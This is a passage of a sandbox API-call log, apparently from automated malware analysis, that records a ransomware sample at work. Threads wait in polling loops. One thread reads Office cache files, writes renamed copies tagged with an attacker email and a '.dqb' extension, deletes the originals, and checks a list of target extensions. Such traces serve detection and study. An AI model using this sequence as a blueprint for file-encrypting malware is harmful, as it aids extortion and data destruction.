(hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0055.187] GetTickCount () returned 0x1d632 [0055.187] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0055.669] GetTickCount () returned 0x1d815 [0055.669] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0055.979] GetTickCount () returned 0x1d93e [0055.979] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0056.324] GetTickCount () returned 0x1daa5 [0056.324] GetTickCount () returned 0x1daa5 [0056.324] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0056.571] GetTickCount () returned 0x1db8f [0056.571] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0056.831] GetTickCount () returned 0x1dc98 [0056.831] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0057.654] GetTickCount () returned 0x1dfd3 [0057.654] GetTickCount () returned 0x1dfd3 [0057.654] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0057.795] GetTickCount () returned 0x1e05f [0057.795] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x102 [0057.986] GetTickCount () returned 0x1e11a [0057.986] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x64) returned 0x0 [0058.071] GetTickCount () returned 0x1e178 [0058.071] Sleep (dwMilliseconds=0x64) [0059.071] GetTickCount () returned 0x1e55e [0059.078] GetTickCount () returned 0x1e55e [0059.078] Sleep (dwMilliseconds=0x64) [0060.047] GetTickCount () returned 0x1e926 [0060.047] Sleep (dwMilliseconds=0x64) [0060.196] GetTickCount () returned 0x1e9c2 [0060.196] GetTickCount () returned 0x1e9c2 [0060.196] Sleep (dwMilliseconds=0x64) [0060.492] GetTickCount () returned 0x1eaea [0060.492] Sleep (dwMilliseconds=0x64) [0060.981] GetTickCount () returned 0x1ecce [0060.981] Sleep (dwMilliseconds=0x64) [0061.793] GetTickCount () returned 0x1eff9 [0061.793] GetTickCount () returned 0x1eff9 [0061.793] Sleep (dwMilliseconds=0x64) Thread: id = 8 os_tid = 0xab4 [0031.740] GetTickCount () returned 0x1816e [0031.741] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x24) returned 0x5bbf58 [0031.741] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5bbf58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11c [0031.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5bbf58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0031.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5bbf58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0031.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5bbf58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c [0031.804] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c01c8 [0031.804] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c01c8, Size=0x20) returned 0x5a5c78 [0031.804] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c01c8 [0031.804] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c01c8, Size=0x20) returned 0x5a5ca0 [0031.804] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.334] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.334] Wow64DisableWow64FsRedirection (in: OldValue=0x25fff84 | out: OldValue=0x25fff84*=0x0) returned 1 [0032.334] lstrlenW (lpString="kernel32.dll") returned 12 [0032.334] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5c78 | out: hHeap=0x570000) returned 1 [0032.334] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.334] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5ca0 | out: hHeap=0x570000) returned 1 [0032.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x5cd438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x118 [0032.336] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0032.619] GetTickCount () returned 0x182f4 [0032.619] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0032.970] GetTickCount () returned 0x183ee [0032.970] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0033.302] GetTickCount () returned 0x18545 [0033.302] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0033.562] GetTickCount () returned 0x18610 [0033.562] GetTickCount () returned 0x18610 [0033.562] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0034.364] GetTickCount () returned 0x18796 [0034.364] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0034.878] GetTickCount () returned 0x18999 [0034.878] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0035.436] GetTickCount () returned 0x18bbb [0035.436] GetTickCount () returned 0x18bbb [0035.436] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0036.045] GetTickCount () returned 0x18e1b [0036.045] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0036.434] GetTickCount () returned 0x18fa1 [0036.434] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0036.747] GetTickCount () returned 0x190ba [0036.747] GetTickCount () returned 0x190ba [0036.747] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0037.112] GetTickCount () returned 0x191e2 [0037.112] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0037.660] GetTickCount () returned 0x193e5 [0037.660] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0038.228] GetTickCount () returned 0x19626 [0038.228] GetTickCount () returned 0x19626 [0038.228] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0038.568] GetTickCount () returned 0x1974f [0038.568] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0039.087] GetTickCount () returned 0x19903 [0039.087] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0039.476] GetTickCount () returned 0x19a89 [0039.476] GetTickCount () returned 0x19a89 [0039.476] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0039.769] GetTickCount () returned 0x19b83 [0039.769] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0039.927] GetTickCount () returned 0x19c1f [0039.927] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0040.152] GetTickCount () returned 0x19d09 [0040.152] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0040.642] GetTickCount () returned 0x19ebe [0040.642] GetTickCount () returned 0x19ebe [0040.642] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0041.071] GetTickCount () returned 0x1a015 [0041.071] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0041.505] GetTickCount () returned 0x1a1ab [0041.505] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0041.928] GetTickCount () returned 0x1a350 [0041.929] GetTickCount () returned 0x1a350 [0041.929] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0042.175] GetTickCount () returned 0x1a40b [0042.175] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0042.486] GetTickCount () returned 0x1a543 [0042.486] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0042.926] GetTickCount () returned 0x1a66b [0042.926] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0043.275] GetTickCount () returned 0x1a7a3 [0043.275] GetTickCount () returned 0x1a7a3 [0043.275] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0043.721] GetTickCount () returned 0x1a968 [0043.721] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0044.025] GetTickCount () returned 0x1aa90 [0044.025] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0044.308] GetTickCount () returned 0x1aba9 [0044.309] GetTickCount () returned 0x1aba9 [0044.309] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0044.734] GetTickCount () returned 0x1ad5e [0044.740] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0044.933] GetTickCount () returned 0x1ae19 [0044.933] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0045.117] GetTickCount () returned 0x1aed4 [0045.117] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0045.345] GetTickCount () returned 0x1afbe [0045.345] GetTickCount () returned 0x1afbe [0045.345] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0045.737] GetTickCount () returned 0x1b144 [0045.742] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0046.026] GetTickCount () returned 0x1b25d [0046.026] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0046.454] GetTickCount () returned 0x1b412 [0046.454] GetTickCount () returned 0x1b412 [0046.454] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0046.686] GetTickCount () returned 0x1b4fc [0046.686] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0047.222] GetTickCount () returned 0x1b70e [0047.222] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0047.789] GetTickCount () returned 0x1b940 [0047.789] GetTickCount () returned 0x1b940 [0047.789] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0048.259] GetTickCount () returned 0x1bb23 [0048.259] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0048.604] GetTickCount () returned 0x1bc7b [0048.604] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0048.723] GetTickCount () returned 0x1bce8 [0048.723] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0049.037] GetTickCount () returned 0x1be4f [0049.070] GetTickCount () returned 0x1be4f [0049.070] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0049.274] GetTickCount () returned 0x1bf19 [0049.274] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0050.199] GetTickCount () returned 0x1c2b2 [0050.199] GetTickCount () returned 0x1c2b2 [0050.199] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0050.420] GetTickCount () returned 0x1c38c [0050.420] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0050.942] GetTickCount () returned 0x1c59f [0050.954] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0051.349] GetTickCount () returned 0x1c734 [0051.349] GetTickCount () returned 0x1c734 [0051.349] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0051.611] GetTickCount () returned 0x1c82e [0051.611] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0052.039] GetTickCount () returned 0x1c9e3 [0052.039] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0052.439] GetTickCount () returned 0x1cb78 [0052.439] GetTickCount () returned 0x1cb78 [0052.439] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0052.707] GetTickCount () returned 0x1cc81 [0052.707] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0052.906] GetTickCount () returned 0x1cd3d [0052.906] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0053.182] GetTickCount () returned 0x1ce55 [0053.182] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0053.601] GetTickCount () returned 0x1cffb [0053.601] GetTickCount () returned 0x1cffb [0053.601] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0053.765] GetTickCount () returned 0x1d097 [0053.765] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0054.237] GetTickCount () returned 0x1d27a [0054.237] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0054.600] GetTickCount () returned 0x1d3e1 [0054.600] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0055.031] GetTickCount () returned 0x1d596 [0055.037] GetTickCount () returned 0x1d596 [0055.037] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0055.642] GetTickCount () returned 0x1d7f6 [0055.642] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0055.962] GetTickCount () returned 0x1d92e [0055.963] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0056.319] GetTickCount () returned 0x1daa5 [0056.323] GetTickCount () returned 0x1daa5 [0056.323] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0056.571] GetTickCount () returned 0x1db8f [0056.571] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0056.831] GetTickCount () returned 0x1dc98 [0056.831] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0057.654] GetTickCount () returned 0x1dfd3 [0057.654] GetTickCount () returned 0x1dfd3 [0057.654] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0057.795] GetTickCount () returned 0x1e05f [0057.795] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x102 [0057.986] GetTickCount () returned 0x1e11a [0057.986] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x64) returned 0x0 [0058.071] GetTickCount () returned 0x1e178 [0058.071] Sleep (dwMilliseconds=0x64) [0059.078] GetTickCount () returned 0x1e55e [0059.078] GetTickCount () returned 0x1e55e [0059.078] Sleep (dwMilliseconds=0x64) [0060.047] GetTickCount () returned 0x1e926 [0060.047] Sleep (dwMilliseconds=0x64) [0060.196] GetTickCount () returned 0x1e9c2 [0060.196] GetTickCount () returned 0x1e9c2 [0060.196] Sleep (dwMilliseconds=0x64) [0060.492] GetTickCount () returned 0x1eaea [0060.492] Sleep (dwMilliseconds=0x64) [0060.981] GetTickCount () returned 0x1ecce [0060.981] Sleep (dwMilliseconds=0x64) [0061.793] GetTickCount () returned 0x1eff9 [0061.793] GetTickCount () returned 0x1eff9 [0061.793] Sleep (dwMilliseconds=0x64) Thread: id = 9 os_tid = 0xab8 [0032.335] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x5f0310 [0032.335] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x600318 [0032.335] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0270 [0032.335] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0x5aa368 [0032.335] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0288 [0032.335] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x3540020 [0032.336] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c02a0 [0032.336] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c02a0, Size=0x20) returned 0x5a5ca0 [0032.336] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c02a0 [0032.336] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c02a0, Size=0x20) returned 0x5a5c78 [0032.336] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.336] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.336] Wow64DisableWow64FsRedirection (in: OldValue=0x227ff58 | out: OldValue=0x227ff58*=0x0) returned 1 [0032.336] lstrlenW (lpString="kernel32.dll") returned 12 [0032.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5ca0 | out: hHeap=0x570000) returned 1 [0032.336] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.336] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5c78 | out: hHeap=0x570000) returned 1 [0032.336] Sleep (dwMilliseconds=0x64) [0032.619] Sleep (dwMilliseconds=0x64) [0032.986] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0032.986] lstrlenW (lpString="ExcelMUI.xml") returned 12 [0032.986] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0032.986] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1565) returned 1 [0032.986] CloseHandle (hObject=0x184) returned 1 [0032.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 0x2020 [0032.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.987] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0032.987] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0032.987] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0032.987] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0032.987] GetLastError () returned 0x0 [0032.987] ReadFile (in: hFile=0x184, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x61d, lpOverlapped=0x0) returned 1 [0033.000] WriteFile (in: hFile=0x188, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x620, lpOverlapped=0x0) returned 1 [0033.001] ReadFile (in: hFile=0x184, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0033.001] WriteFile (in: hFile=0x188, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0033.001] SetEndOfFile (hFile=0x188) returned 1 [0033.001] CloseHandle (hObject=0x188) returned 1 [0033.002] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.002] SetEndOfFile (hFile=0x184) returned 1 [0033.003] CloseHandle (hObject=0x184) returned 1 [0033.003] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0033.003] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 1 [0033.003] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.003] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.003] lstrlenW (lpString=".doc") returned 4 [0033.003] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.003] lstrlenW (lpString=".docx") returned 5 [0033.003] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0033.003] lstrlenW (lpString=".pdf") returned 4 [0033.003] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.003] lstrlenW (lpString=".xls") returned 4 [0033.003] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.003] lstrlenW (lpString=".xlsx") returned 5 [0033.003] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0033.004] lstrlenW (lpString=".ppt") returned 4 [0033.004] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.004] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.004] lstrlenW (lpString=".zip") returned 4 [0033.004] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.004] lstrlenW (lpString=".rar") returned 4 [0033.004] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.004] lstrlenW (lpString=".bz2") returned 4 [0033.004] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.004] lstrlenW (lpString=".7z") returned 3 [0033.004] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.004] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.004] lstrlenW (lpString=".dbf") returned 4 [0033.004] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.004] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.004] lstrlenW (lpString=".1cd") returned 4 [0033.004] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.004] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.004] lstrlenW (lpString=".jpg") returned 4 [0033.004] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.004] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.004] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.004] lstrlenW (lpString=".doc") returned 4 [0033.004] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.004] lstrlenW (lpString=".docx") returned 5 [0033.004] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0033.004] lstrlenW (lpString=".pdf") returned 4 [0033.004] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.004] lstrlenW (lpString=".xls") returned 4 [0033.004] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.004] lstrlenW (lpString=".xlsx") returned 5 [0033.004] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0033.004] lstrlenW (lpString=".ppt") returned 4 [0033.004] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.004] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.005] lstrlenW (lpString=".zip") returned 4 [0033.005] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.005] lstrlenW (lpString=".rar") returned 4 [0033.005] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.005] lstrlenW (lpString=".bz2") returned 4 [0033.005] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.005] lstrlenW (lpString=".7z") returned 3 [0033.005] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.005] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.005] lstrlenW (lpString=".dbf") returned 4 [0033.005] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.005] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.005] lstrlenW (lpString=".1cd") returned 4 [0033.005] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.005] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0033.005] lstrlenW (lpString=".jpg") returned 4 [0033.005] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.005] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0033.005] lstrlenW (lpString="Setup.xml") returned 9 [0033.005] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.005] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=2296) returned 1 [0033.005] CloseHandle (hObject=0x184) returned 1 [0033.006] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0033.006] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0033.006] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.006] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.006] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.006] CreateFileW (lpFileName="C:\\MSOCache\\All 